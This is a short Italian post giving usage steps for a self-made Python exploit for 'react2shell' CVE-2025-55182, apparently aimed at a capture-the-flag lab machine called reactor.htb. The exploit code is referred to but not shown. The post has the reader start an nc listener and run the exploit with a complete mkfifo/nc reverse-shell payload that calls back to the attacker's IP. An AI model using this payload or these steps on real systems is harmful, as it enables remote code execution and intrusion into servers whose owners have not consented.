
Ho creato un semplice exploit python react2shell CVE-2025-55182
Ho creato un semplice exploit Python per react2shell CVE-2025-55182 USAGE
Salva lo script: salva il codice sopra come exploit.py.
Aggiorna gli Host: assicurati che reactor.htb risolva all'IP di destinazione nel tuo file /etc/hosts. echo "<TARGET_IP> reactor.htb" | sudo tee -a /etc/hosts
Avvia il Listener: apri un terminale per catturare la reverse shell. nc -lvnp 4444
Esegui l'Exploit: esegui lo script con un payload di reverse shell. python3 exploit.py http://reactor.htb:3000 "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc <YOUR_IP> 4444 >/tmp/f"
Sostituisci <YOUR_IP> con il tuo indirizzo IP tun0.